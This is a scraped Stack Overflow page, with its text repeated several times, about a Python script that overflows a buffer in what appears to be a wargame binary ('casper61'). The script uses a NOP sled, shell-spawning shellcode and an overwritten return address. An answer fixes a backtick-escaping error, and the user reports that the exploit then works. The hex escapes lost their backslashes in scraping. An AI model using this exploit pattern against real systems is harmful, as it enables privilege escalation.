Python script issue: “sh: 1: Syntax error: EOF in backquote substitution”
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty{ height:90px;width:728px;box-sizing:border-box;
}
When I try to execute the following script:
#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "x90"*40
shellcode="x31xc0x50x68x2fx2fx78x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"
buf_addr= "x60x98x04x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()
I got this error:
sh: 1:Syntax error: EOF in backquote substitution.
I have another similar script that in which only the buffer address is different which works without any problem.
Can someone help me? Thanks
python bash
add a comment |
When I try to execute the following script:
#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "x90"*40
shellcode="x31xc0x50x68x2fx2fx78x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"
buf_addr= "x60x98x04x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()
I got this error:
sh: 1:Syntax error: EOF in backquote substitution.
I have another similar script that in which only the buffer address is different which works without any problem.
Can someone help me? Thanks
python bash
1
It looks like your shebang is wrong. You probably want either#!/usr/bin/python
or#!/usr/bin/env python
– shay
Nov 23 '18 at 17:35
Python 2 or 3 ?
– Pedro Lobito
Nov 23 '18 at 17:35
@shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python
– hellballer
Nov 23 '18 at 17:38
@PedroLobito i'm using version 2.7.6
– hellballer
Nov 23 '18 at 17:44
add a comment |
When I try to execute the following script:
#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "x90"*40
shellcode="x31xc0x50x68x2fx2fx78x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"
buf_addr= "x60x98x04x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()
I got this error:
sh: 1:Syntax error: EOF in backquote substitution.
I have another similar script that in which only the buffer address is different which works without any problem.
Can someone help me? Thanks
python bash
When I try to execute the following script:
#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "x90"*40
shellcode="x31xc0x50x68x2fx2fx78x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"
buf_addr= "x60x98x04x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()
I got this error:
sh: 1:Syntax error: EOF in backquote substitution.
I have another similar script that in which only the buffer address is different which works without any problem.
Can someone help me? Thanks
python bash
python bash
edited Nov 23 '18 at 17:46
hellballer
asked Nov 23 '18 at 17:30
hellballerhellballer
116
116
1
It looks like your shebang is wrong. You probably want either#!/usr/bin/python
or#!/usr/bin/env python
– shay
Nov 23 '18 at 17:35
Python 2 or 3 ?
– Pedro Lobito
Nov 23 '18 at 17:35
@shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python
– hellballer
Nov 23 '18 at 17:38
@PedroLobito i'm using version 2.7.6
– hellballer
Nov 23 '18 at 17:44
add a comment |
1
It looks like your shebang is wrong. You probably want either#!/usr/bin/python
or#!/usr/bin/env python
– shay
Nov 23 '18 at 17:35
Python 2 or 3 ?
– Pedro Lobito
Nov 23 '18 at 17:35
@shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python
– hellballer
Nov 23 '18 at 17:38
@PedroLobito i'm using version 2.7.6
– hellballer
Nov 23 '18 at 17:44
1
1
It looks like your shebang is wrong. You probably want either
#!/usr/bin/python
or #!/usr/bin/env python
– shay
Nov 23 '18 at 17:35
It looks like your shebang is wrong. You probably want either
#!/usr/bin/python
or #!/usr/bin/env python
– shay
Nov 23 '18 at 17:35
Python 2 or 3 ?
– Pedro Lobito
Nov 23 '18 at 17:35
Python 2 or 3 ?
– Pedro Lobito
Nov 23 '18 at 17:35
@shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python
– hellballer
Nov 23 '18 at 17:38
@shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python
– hellballer
Nov 23 '18 at 17:38
@PedroLobito i'm using version 2.7.6
– hellballer
Nov 23 '18 at 17:44
@PedroLobito i'm using version 2.7.6
– hellballer
Nov 23 '18 at 17:44
add a comment |
1 Answer
1
active
oldest
votes
The generated exploit contains a `
(backquote/backtick) which causes the error, escaping it should fix it.
'/casper/casper61 xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x901xc3x80Ph//xhh/binxc2x89xc3xa3Pxc2x89xc3xa2Sxc2x89xc3xa1xc2xb0x0bxc3x8dxc2x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\`<-HERExc2x98x04x08'
payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\`')
It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.
– hellballer
Nov 23 '18 at 17:52
You're welcome, glad it works! Regarding your comment, I've no idea ;-)
– Pedro Lobito
Nov 23 '18 at 17:55
1
Well, thank you anyway :)
– hellballer
Nov 23 '18 at 18:03
add a comment |
Your Answer
StackExchange.ifUsing("editor", function () {
StackExchange.using("externalEditor", function () {
StackExchange.using("snippets", function () {
StackExchange.snippets.init();
});
});
}, "code-snippets");
StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "1"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});
function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});
}
});
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53450871%2fpython-script-issue-sh-1-syntax-error-eof-in-backquote-substitution%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
The generated exploit contains a `
(backquote/backtick) which causes the error, escaping it should fix it.
'/casper/casper61 xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x901xc3x80Ph//xhh/binxc2x89xc3xa3Pxc2x89xc3xa2Sxc2x89xc3xa1xc2xb0x0bxc3x8dxc2x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\`<-HERExc2x98x04x08'
payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\`')
It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.
– hellballer
Nov 23 '18 at 17:52
You're welcome, glad it works! Regarding your comment, I've no idea ;-)
– Pedro Lobito
Nov 23 '18 at 17:55
1
Well, thank you anyway :)
– hellballer
Nov 23 '18 at 18:03
add a comment |
The generated exploit contains a `
(backquote/backtick) which causes the error, escaping it should fix it.
'/casper/casper61 xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x901xc3x80Ph//xhh/binxc2x89xc3xa3Pxc2x89xc3xa2Sxc2x89xc3xa1xc2xb0x0bxc3x8dxc2x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\`<-HERExc2x98x04x08'
payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\`')
It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.
– hellballer
Nov 23 '18 at 17:52
You're welcome, glad it works! Regarding your comment, I've no idea ;-)
– Pedro Lobito
Nov 23 '18 at 17:55
1
Well, thank you anyway :)
– hellballer
Nov 23 '18 at 18:03
add a comment |
The generated exploit contains a `
(backquote/backtick) which causes the error, escaping it should fix it.
'/casper/casper61 xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x901xc3x80Ph//xhh/binxc2x89xc3xa3Pxc2x89xc3xa2Sxc2x89xc3xa1xc2xb0x0bxc3x8dxc2x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\`<-HERExc2x98x04x08'
payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\`')
The generated exploit contains a `
(backquote/backtick) which causes the error, escaping it should fix it.
'/casper/casper61 xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x901xc3x80Ph//xhh/binxc2x89xc3xa3Pxc2x89xc3xa2Sxc2x89xc3xa1xc2xb0x0bxc3x8dxc2x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\`<-HERExc2x98x04x08'
payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\`')
answered Nov 23 '18 at 17:46
Pedro LobitoPedro Lobito
50.6k16138172
50.6k16138172
It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.
– hellballer
Nov 23 '18 at 17:52
You're welcome, glad it works! Regarding your comment, I've no idea ;-)
– Pedro Lobito
Nov 23 '18 at 17:55
1
Well, thank you anyway :)
– hellballer
Nov 23 '18 at 18:03
add a comment |
It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.
– hellballer
Nov 23 '18 at 17:52
You're welcome, glad it works! Regarding your comment, I've no idea ;-)
– Pedro Lobito
Nov 23 '18 at 17:55
1
Well, thank you anyway :)
– hellballer
Nov 23 '18 at 18:03
It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.
– hellballer
Nov 23 '18 at 17:52
It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.
– hellballer
Nov 23 '18 at 17:52
You're welcome, glad it works! Regarding your comment, I've no idea ;-)
– Pedro Lobito
Nov 23 '18 at 17:55
You're welcome, glad it works! Regarding your comment, I've no idea ;-)
– Pedro Lobito
Nov 23 '18 at 17:55
1
1
Well, thank you anyway :)
– hellballer
Nov 23 '18 at 18:03
Well, thank you anyway :)
– hellballer
Nov 23 '18 at 18:03
add a comment |
Thanks for contributing an answer to Stack Overflow!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53450871%2fpython-script-issue-sh-1-syntax-error-eof-in-backquote-substitution%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
1
It looks like your shebang is wrong. You probably want either
#!/usr/bin/python
or#!/usr/bin/env python
– shay
Nov 23 '18 at 17:35
Python 2 or 3 ?
– Pedro Lobito
Nov 23 '18 at 17:35
@shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python
– hellballer
Nov 23 '18 at 17:38
@PedroLobito i'm using version 2.7.6
– hellballer
Nov 23 '18 at 17:44